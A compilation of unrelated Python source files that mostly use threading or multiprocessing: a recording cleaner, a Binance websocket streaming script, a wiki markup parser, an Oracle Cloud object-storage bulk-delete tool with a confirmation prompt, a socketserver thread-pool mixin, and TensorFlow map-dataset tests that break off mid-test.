import argparse
from multiprocessing import Process
from pathlib import Path
from shutil import copyfile
import derp.util
def clean(topic, path, tmp_path):
""" Cleaning is simply the act of writing only complete messages """
copyfile(path, tmp_path)
with open(tmp_path, 'rb') as topic_reader, open(path, 'wb') as topic_writer:
for msg in derp.util.TOPICS[topic].read_multiple(topic_reader):
msg.as_builder().write(topic_writer)
topic_writer.flush()
def main():
""" Create a process for each cleaning """
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("path", type=Path, help="location of a recording")
args = parser.parse_args()
for topic in derp.util.TOPICS:
path = args.path / (topic + '.bin')
tmp_path = args.path / (topic + '.bin.bak')
if path.exists():
proc = Process(target=clean, name=topic, args=(topic, path, tmp_path))
proc.start()
proc.join()
tmp_path.unlink()
if __name__ == "__main__":
main()
|
dev_stream_everything_and_unicorn_fy.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_stream_everything_and_unicorn_fy.py
#
# Part of ‘UnicornFy’
# Project website: https://github.com/oliver-zehentleitner/unicorn-fy
# Documentation: https://oliver-zehentleitner.github.io/unicorn-fy
# PyPI: https://pypi.org/project/unicorn-fy
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
from unicorn_fy.unicorn_fy import UnicornFy
import logging
import os
import requests
import sys
import time
import threading
try:
from binance.client import Client
except ImportError:
print("Please install `python-binance`!")
sys.exit(1)
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is not False:
unicorn_fied_data = UnicornFy.binance_com_websocket(oldest_stream_data_from_stream_buffer)
print(str(unicorn_fied_data))
else:
time.sleep(0.01)
binance_api_key = ""
binance_api_secret = ""
channels = {'aggTrade', 'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_2h', 'kline_4h',
'kline_6h', 'kline_8h', 'kline_12h', 'kline_1d', 'kline_3d', 'kline_1w', 'kline_1M', 'miniTicker',
'ticker', 'bookTicker', 'depth5', 'depth10', 'depth20', 'depth', 'depth@100ms'}
arr_channels = {'!miniTicker', '!ticker', '!bookTicker'}
markets = []
try:
binance_rest_client = Client(binance_api_key, binance_api_secret)
binance_websocket_api_manager = BinanceWebSocketApiManager()
except requests.exceptions.ConnectionError:
print("No internet connection?")
sys.exit(1)
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
data = binance_rest_client.get_all_tickers()
for item in data:
markets.append(item['symbol'])
binance_websocket_api_manager.set_private_api_config(binance_api_key, binance_api_secret)
userdata_stream_id = binance_websocket_api_manager.create_stream(["!userData"], ["arr"])
arr_stream_id = binance_websocket_api_manager.create_stream(arr_channels, "arr")
for channel in channels:
binance_websocket_api_manager.create_stream(channel, markets, stream_label=channel)
stream_id_trade = binance_websocket_api_manager.get_stream_id_by_label("trade")
binance_websocket_api_manager.get_stream_subscriptions(stream_id_trade)
#while True:
# binance_websocket_api_manager.print_summary()
# time.sleep(1)
|
mark.py
|
from set_mark.namu import namu
import re
import html
import sqlite3
import urllib.parse
import threading
import multiprocessing
def load_conn2(data):
global conn
global curs
conn = data
curs = conn.cursor()
def send_parser(data):
if not re.search('^<br>$', data):
data = html.escape(data)
javascript = re.compile('javascript:', re.I)
data = javascript.sub('', data)
while 1:
re_data = re.search('<a(?: (?:(?:(?!>).)*))?>(?P<in>(?:(?!<).)*)<\/a>', data)
if re_data:
re_data = re_data.groups()[0]
data = re.sub('<a(?: (?:(?:(?!>).)*))?>(?P<in>(?:(?!<).)*)<\/a>', '<a href="/w/' + urllib.parse.quote(re_data).replace('/','%2F') + '">' + re_data + '</a>', data, 1)
else:
break
return data
def plusing(data):
for data_in in data:
curs.execute("select title from back where title = ? and link = ? and type = ?", [data_in[1], data_in[0], data_in[2]])
if not curs.fetchall():
curs.execute("insert into back (title, link, type) values (?, ?, ?)", [data_in[1], data_in[0], data_in[2]])
def namumark(title = '', data = None, num = 0):
if data != None:
curs.execute('select data from other where name = "markup"')
rep_data = curs.fetchall()
if rep_data[0][0] == 'namumark':
data = namu(conn, data, title, num)
else:
data = ['', '', []]
if num == 1:
data_num = len(data[2])
data_in_num = int(data_num / 8)
data_in = []
for i in range(8):
if not i == 7:
data_in += [data[2][data_in_num * i:data_in_num * (i + 1)]]
else:
data_in += [data[2][data_in_num * i:]]
for data_in_for in data_in:
thread_start = threading.Thread(target = plusing, args = [data_in_for])
thread_start.start()
thread_start.join()
conn.commit()
return data[0] + data[1]
else:
return 'http request 404'
|
object_storage_bulk_delete.py
|
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
##########################################################################
# object_storage_bulk_delete.py
#
# @author: Adi Zohar
#
# Supports Python 3
#
# DISCLAIMER – This is not an official Oracle application, It does not supported by Oracle Support, It should NOT be used for utilization calculation purposes
##########################################################################
# Info:
# Bulk delete with parallel threads
#
##########################################################################
# Application Command line parameters
#
# -c config - Config file section to use (tenancy profile)
# -t profile - Profile in config file, DEFAULT as default
# -p proxy - Set Proxy (i.e. www-proxy-server.com:80)
# -ip - Use Instance Principals for Authentication
# -dt - Use Instance Principals with delegation token for cloud shell
# -sb source_bucket
# -sp source_prefix
# -sr source_region
##########################################################################
import threading
import time
import queue
import oci
import argparse
import datetime
import sys
import click
import os
##########################################################################
# Pre Main
##########################################################################
# Get Command Line Parser
parser = argparse.ArgumentParser()
parser.add_argument('-t', default="", dest='config_profile', help='Config file section to use (tenancy profile)')
parser.add_argument('-p', default="", dest='proxy', help='Set Proxy (i.e. www-proxy-server.com:80) ')
parser.add_argument('-ip', action='store_true', default=False, dest='is_instance_principals', help='Use Instance Principals for Authentication')
parser.add_argument('-dt', action='store_true', default=False, dest='is_delegation_token', help='Use Delegation Token for Authentication')
parser.add_argument('-c', default="", dest='config_file', help="Config File (default=~/.oci/config)")
parser.add_argument('-sb', default="", dest='source_bucket', help='Source Bucket Name')
parser.add_argument('-sp', default="", dest='source_prefix', help='Source Prefix Include')
parser.add_argument('-se', default="", dest='source_prefix_exclude', help='Source Prefix Exclude')
parser.add_argument('-exclude_dirs', action='store_true', default=False, dest='source_exclude_dirs', help='Exclude Directories')
parser.add_argument('-sr', default="", dest='source_region', help='Source Region')
cmd = parser.parse_args()
if len(sys.argv) < 1:
parser.print_help()
raise SystemExit
if not cmd.source_bucket:
print("Source bucket parameter is required !!!\n")
parser.print_help()
raise SystemExit
source_bucket = cmd.source_bucket
source_prefix = cmd.source_prefix
# Parameters
worker_count = 40
status_interval = 60
base_retry_timeout = 2
max_retry_timeout = 16**2
# global queue
q = queue.Queue()
# Global Variables
object_storage_client = None
source_namespace = ""
source_bucket = cmd.source_bucket
source_prefix = cmd.source_prefix
source_prefix_exclude = cmd.source_prefix_exclude
source_region = cmd.source_region
source_exclude_dirs = cmd.source_exclude_dirs
# Update Variables based on the parameters
config_file = (cmd.config_file if cmd.config_file else oci.config.DEFAULT_LOCATION)
config_profile = (cmd.config_profile if cmd.config_profile else oci.config.DEFAULT_PROFILE)
##########################################################################
# Create signer for Authentication
# Input - config_file, config_profile and is_instance_principals and is_delegation_token
# Output - config and signer objects
##########################################################################
def create_signer(config_file, config_profile, is_instance_principals, is_delegation_token):
# if instance principals authentications
if is_instance_principals:
try:
signer = oci.auth.signers.InstancePrincipalsSecurityTokenSigner()
config = {'region': signer.region, 'tenancy': signer.tenancy_id}
return config, signer
except Exception:
print_header("Error obtaining instance principals certificate, aborting")
raise SystemExit
# -----------------------------
# Delegation Token
# -----------------------------
elif is_delegation_token:
try:
# check if env variables OCI_CONFIG_FILE, OCI_CONFIG_PROFILE exist and use them
env_config_file = os.environ.get('OCI_CONFIG_FILE')
env_config_section = os.environ.get('OCI_CONFIG_PROFILE')
# check if file exist
if env_config_file is None or env_config_section is None:
print("*** OCI_CONFIG_FILE and OCI_CONFIG_PROFILE env variables not found, abort. ***")
print("")
raise SystemExit
config = oci.config.from_file(env_config_file, env_config_section)
delegation_token_location = config["delegation_token_file"]
with open(delegation_token_location, 'r') as delegation_token_file:
delegation_token = delegation_token_file.read().strip()
# get signer from delegation token
signer = oci.auth.signers.InstancePrincipalsDelegationTokenSigner(delegation_token=delegation_token)
return config, signer
except KeyError:
print("* Key Error obtaining delegation_token_file")
raise SystemExit
except Exception:
raise
# -----------------------------
# config file authentication
# -----------------------------
else:
config = oci.config.from_file(
(config_file if config_file else oci.config.DEFAULT_LOCATION),
(config_profile if config_profile else oci.config.DEFAULT_PROFILE)
)
signer = oci.signer.Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=oci.config.get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
return config, signer
##############################################################################
# get time
##############################################################################
def get_time(full=False):
if full:
return str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
else:
return str(datetime.datetime.now().strftime("%H:%M:%S"))
##########################################################################
# Print header centered
##########################################################################
def print_header(name):
chars = int(90)
print("")
print('#' * chars)
print("#" + name.center(chars - 2, " ") + "#")
print('#' * chars)
##########################################################################
# Print Info
##########################################################################
def print_command_info():
print_header("Running Object Storage Bulk Delete")
print("Written by Adi Zohar, July 2020")
print("Starts at : " + get_time(full=True))
print("Command Line : " + ' '.join(x for x in sys.argv[1:]))
print("Source Namespace : " + source_namespace)
print("Source Bucket : " + source_bucket)
print("Source Prefix Include : " + source_prefix)
print("Source Prefix Exclude : " + source_prefix_exclude)
print("Source Region : " + source_region)
if source_exclude_dirs:
print("Source Exclude Dirs : True")
##############################################################################
# Worker
##############################################################################
def worker():
while True:
object_ = q.get()
interval_exp = base_retry_timeout
while True:
response = None
try:
response = object_storage_client.delete_object(source_namespace, source_bucket, object_)
break
except Exception as e:
if e.status == 400:
break
if interval_exp > max_retry_timeout:
print(" ERROR: Failed to request delete of %s" % (object_))
raise
if response:
print(" Received %s from API for object %s, will wait %s seconds before retrying." % (response.status, object_, interval_exp))
else:
print(" Received error from API for object %s, will wait %s seconds before retrying." % (object_, interval_exp))
time.sleep(interval_exp)
interval_exp **= 2
continue
q.task_done()
##############################################################################
# Add object to Q
##############################################################################
def add_objects_to_queue(ns, source_bucket):
global q
count = 0
next_starts_with = None
while True:
response = object_storage_client.list_objects(ns, source_bucket, start=next_starts_with, prefix=source_prefix, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
next_starts_with = response.data.next_start_with
for object_ in response.data.objects:
if source_prefix_exclude and object_.name.startswith(source_prefix_exclude):
continue
if source_exclude_dirs and "/" in object_.name:
continue
q.put(object_.name)
count += 1
if count % 100000 == 0:
print(get_time() + " - Added " + str(count) + " files to queue...")
if not next_starts_with:
break
return count
##############################################################################
# connect to object storage
##############################################################################
def connect_to_object_storage():
global source_namespace
global object_storage_client
global source_region
# get signer
config, signer = create_signer(cmd.config_file, cmd.config_profile, cmd.is_instance_principals, cmd.is_delegation_token)
# if region is specified
if source_region:
config['region'] = source_region
else:
source_region = config['region']
try:
# connect and fetch namespace
print("\nConnecting to Object Storage Service...")
object_storage_client = oci.object_storage.ObjectStorageClient(config, signer=signer)
if cmd.proxy:
object_storage_client.base_client.session.proxies = {'https': cmd.proxy}
# retrieve namespace from object storage
source_namespace = object_storage_client.get_namespace(retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
print("Succeed.")
except Exception as e:
print("\nError connecting to Object Storage - " + str(e))
raise SystemExit
##############################################################################
# Main
##############################################################################
def main():
# connect to object storage
connect_to_object_storage()
# command info
print_command_info()
if not click.confirm('\nAre you sure you want to continue deleting ?'):
raise SystemExit
print_header("Start Processing")
print(get_time() + " - Creating %s workers." % (worker_count))
for i in range(worker_count):
w = threading.Thread(target=worker)
w.daemon = True
w.start()
print(get_time() + " - Getting list of objects from source source_bucket (%s). delete will start immediately." % (source_bucket))
count = add_objects_to_queue(source_namespace, source_bucket)
print(get_time() + " - Enqueued %s objects to be deleted" % (count))
while count > 0:
print(get_time() + " - Waiting %s seconds before checking status." % (status_interval))
time.sleep(status_interval)
if q.qsize() == 0:
print(get_time() + " - deletion of all objects has been requested.")
break
else:
print(get_time() + " - %s object deletes remaining to requested." % (q.qsize()))
q.join()
print_header("Completed")
print("Completed at : " + get_time(True))
##############################################################################
# Execute
##############################################################################
if __name__ == '__main__':
main()
|
ThreadPoolMixIn.py
|
from socketserver import ThreadingMixIn
import threading
from queue import Queue, Empty
class ThreadPoolMixIn(ThreadingMixIn):
"""Mix-in class to handle requests in a thread pool.
The pool grows and thrinks depending on load.
For instance, a threading UDP server class is created as follows:
class ThreadPoolingUDPServer(ThreadPoolingMixIn, UDPServer):
pass
"""
def init_thread_pool(self, min_workers = 5,
max_workers = 200, min_spare_workers = 20):
"""Initialize thread pool."""
self.q = Queue()
self.min_workers = min_workers
self.max_workers = max_workers
self.min_spare_workers = min_spare_workers
self.num_workers = 0
self.num_busy_workers = 0
self.workers_mutex = threading.Lock()
self.start_workers(self.min_workers)
def start_workers(self, n):
"""Start n workers."""
for i in range(n):
t = threading.Thread(target = self.worker)
t.daemon = True
t.start()
def worker(self):
"""A function of a working thread.
It gets a request from queue (blocking if there
are no requests) and processes it.
After processing it checks how many spare workers
are there now and if this value is greater than
self.min_spare_workers then the worker exits.
Otherwise it loops infinitely.
"""
with self.workers_mutex:
self.num_workers += 1
while 1:
(request, client_address) = self.q.get()
with self.workers_mutex:
self.num_busy_workers += 1
self.process_request_thread(request, client_address)
self.q.task_done()
with self.workers_mutex:
self.num_busy_workers -= 1
if self.num_workers - self.num_busy_workers > \
self.min_spare_workers:
self.num_workers -= 1
return
def process_request(self, request, client_address):
"""Puts a request into queue.
If the queue size is too large, it adds extra worker.
"""
self.q.put((request, client_address))
with self.workers_mutex:
if self.q.qsize() > 3 and self.num_workers < self.max_workers:
self.start_workers(1)
def join(self):
"""Wait for all busy threads"""
self.q.join()
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import numpy as np
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_threads,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_threads = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(components, count, num_threads,
output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_threads_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_threads_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_threads_val, output_buffer_size_val)
def _testDisposeParallelMapDataset(self, explicit_dispose):
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
if explicit_dispose:
dispose_op = iterator.dispose_op()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
if explicit_dispose:
sess.run(dispose_op)
def testExplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(True)
def testImplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(False)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReadFileIgnoreError(self):
def write_string_to_file(value, filename):
with open(filename, "w") as f:
f.write(value)
filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
for i in range(5)]
for filename in filenames:
write_string_to_file(filename, filename)
dataset = (dataset_ops.Dataset.from_tensor_slices(filenames)
.map(io_ops.read_file, num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# All of the files are present.
sess.run(init_op)
for filename in filenames:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Delete one of the files.
os.remove(filenames[0])
# Attempting to read filenames[0] will fail, but ignore_errors()
# will catch the error.
sess.run(init_op)
for filename in filenames[1:]:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
print(sess.run(get_next))
print(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: (queue.dequeue(), queue_2.dequeue()))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for i in range(100):
self.assertEqual(sorted([elements[i * 2], elements[i * 2 + 1]]),
sorted(sess.run(get_next)))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
with self.test_session() as sess:
with self.assertRaisesRegexp(errors.FailedPreconditionError,
"Failed to capture resource"):
sess.run(init_op)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
